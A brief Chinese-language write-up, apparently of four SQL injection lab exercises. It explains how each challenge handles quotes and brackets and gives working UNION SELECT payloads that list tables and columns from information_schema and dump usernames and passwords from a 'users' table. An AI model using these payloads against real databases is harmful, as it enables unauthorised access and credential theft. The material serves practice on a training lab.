四体方法差不多。
第一题添加单引号会报错;
第二题需要将单引号编码
第三题注入个单引号,报错后会发现有个右括号,类似(‘x’)这种。
第四题注入个双引号,报错后发现类似(“x”)这种。
通过控制x参数获取security中有几张表
union select null,table_name,null from information_schema.tables where table_schema = 'security' limit x,1 -- -
——————————
同理获得列名。
union select null,column_name,null from information_schema.columns where table_name = 'users' limit x,1 -- -
————————————
获得账户和密码
union SELECT null, group_concat(CONCAT_WS("@",username, password)),null FROM users -- -
搜索了一下其他人的答案,学习了group_concat()函数,组合多个字段成一个字符串。